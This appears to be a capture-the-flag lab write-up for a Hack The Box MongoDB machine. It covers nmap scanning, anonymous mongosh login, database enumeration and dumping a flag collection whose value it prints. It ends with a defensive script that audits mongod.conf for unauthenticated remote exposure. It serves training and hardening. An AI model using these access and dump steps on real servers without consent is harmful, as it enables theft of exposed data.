07.MONGOD (MONGODB)
MongoDB, Databases, Reconnaissance, Misconfiguration, Anonymous/Guest Access
root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn
root@htb:~$ nmap -sV -T4 {targetIP} -p-
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
27017/tcp open mongodb MongoDB 3.6.8
root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 27017
PORT STATE SERVICE VERSION
27017/tcp open mongodb MongoDB 3.6.8 3.6.8
| mongodb-info:
| MongoDB Build info
| openssl
| running = OpenSSL 1.1.1f 31 Mar 2020
| compiled = OpenSSL 1.1.1f 31 Mar 2020
| ok = 1.0
| buildEnvironment
| target_arch = x86_64
| distmod =
| target_os = linux
...
* the -sC option runs the default set of Nmap scripts (NSE scripts), which typically include
scripts for service enumeration, version detection, and other basic checks.
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 27017
PORT STATE SERVICE
27017/tcp open mongod
* the --script=vuln option runs scripts that focus specifically on detecting known
vulnerabilities in the service running on port 27017
- e.g., weak configurations, or known vulnerabilities in the MongoDB service
- if no results are found then the service may be fully patched!
root@htb:~$ which mongosh
root@htb:~$ sudo apt search mongosh
mongodb-mongosh/bullseye/mongodb-org/7.0 2.3.7 amd64 [upgradable from: 1.10.6] MongoDB Shell CLI REPL Package
root@htb:~$ sudo apt install mongodb-mongosh
* ALT: wget https://github.com/mongodb-js/mongosh/releases/download/v2.0.0/mongosh-2.0.0-linux-x64.tgz
tar xvf mongosh-2.0.0-linux-x64.tgz
cd mongosh-2.0.0-linux-x64/bin
./mongosh mongodb://{targetIP}:27017
- use the older version of mongosh due to client/server version incompatibility
#connecting to the MongoDB server running on the remote host as an anonymous user.
root@htb:~$ which mongosh
/usr/bin/mongosh
* mongosh is the MongoDB Shell utility used to connect to the remote MongoDB server
root@htb:~$ mongosh mongodb://10.129.255.118:27017
* this cmd will automatically connect to the remote MongoDB server using anonymous credentials (if allowed)
#enumeration
mongoDB> show dbs; //list databases
admin 32.00 KiB
config 72.00 KiB
local 72.00 KiB
sensitive_information 32.00 KiB
users 32.00 KiB
mongoDB> use sensitive_information; //access a database
switched to db sensitive_information
mongoDB\sensitive_information> show collections; //list collections stored in the database named sensitive_information
flag
mongoDB\sensitive_information> db.flag.find();
[
{
_id: ObjectId("630e3dbcb82540ebbd1748c5"),
flag: '1b6e6fb359e7c40241b6d431427ba6ea'
}
]
* the db.{collectionName}.find() cmd will dump the contents of the documents in that collection
* ALT: mongoDB\sensitive_information> db.flag.find().pretty(); //dump contents of the documents present in the flag collection
[
{
_id: ObjectId("630e3dbcb82540ebbd1748c5"),
flag: '1b6e6fb359e7c40241b6d431427ba6ea'
}
]
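The anonymous login and dump above only work when mongod accepts remote connections and authorization is off. The script below is an added example, not part of the original notes: it checks a mongod.conf for that combination on the server side. It assumes the settings live in the YAML config file (command-line flags such as --auth are not inspected), and the two sample configs are constructed.

```sh
#!/bin/sh
# Added example: flag a mongod.conf that permits anonymous remote access.

# Flatten two-level YAML into "section.key=value" lines (comments stripped).
flatten_conf() {
    awk '
        { sub(/[ \t]*#.*/, "") }
        /^[A-Za-z]+:[ \t]*$/ { sec = $1; sub(/:$/, "", sec); next }
        /^[ \t]+[A-Za-z]+:/ {
            key = $1; sub(/:$/, "", key)
            val = $0; sub(/^[^:]*:[ \t]*/, "", val)
            gsub(/[" \t]/, "", val)
            print sec "." key "=" val
        }' "$1"
}

audit_mongod_conf() {
    settings=$(flatten_conf "$1")
    auth=$(printf '%s\n' "$settings" | sed -n 's/^security\.authorization=//p')
    bind=$(printf '%s\n' "$settings" | sed -n 's/^net\.bindIp=//p')
    bindall=$(printf '%s\n' "$settings" | sed -n 's/^net\.bindIpAll=//p')

    # MongoDB 3.6+ listens on localhost only unless bindIp/bindIpAll say otherwise.
    exposed=no
    if [ "$bindall" = "true" ]; then exposed=yes; fi
    for ip in $(printf '%s' "$bind" | tr ',' ' '); do
        case "$ip" in
            127.*|localhost|::1) ;;   # loopback only
            *) exposed=yes ;;         # 0.0.0.0, ::, or a routable address
        esac
    done

    if [ "$auth" = "enabled" ]; then
        echo "OK: authorization enabled"
    elif [ "$exposed" = yes ]; then
        echo "CRITICAL: remote listener without authorization"
    else
        echo "WARN: authorization disabled, loopback only"
    fi
}

# Constructed sample configs (not taken from the target host).
WEAK=$(mktemp); HARD=$(mktemp)
printf 'net:\n  port: 27017\n  bindIp: 0.0.0.0   # all interfaces\n' > "$WEAK"
printf 'net:\n  port: 27017\n  bindIp: 127.0.0.1,10.0.0.5\nsecurity:\n  authorization: enabled\n' > "$HARD"
echo "weak:     $(audit_mongod_conf "$WEAK")"
echo "hardened: $(audit_mongod_conf "$HARD")"
```

A CRITICAL result corresponds to the state of the target in these notes: port 27017 reachable from the network and every database readable without credentials.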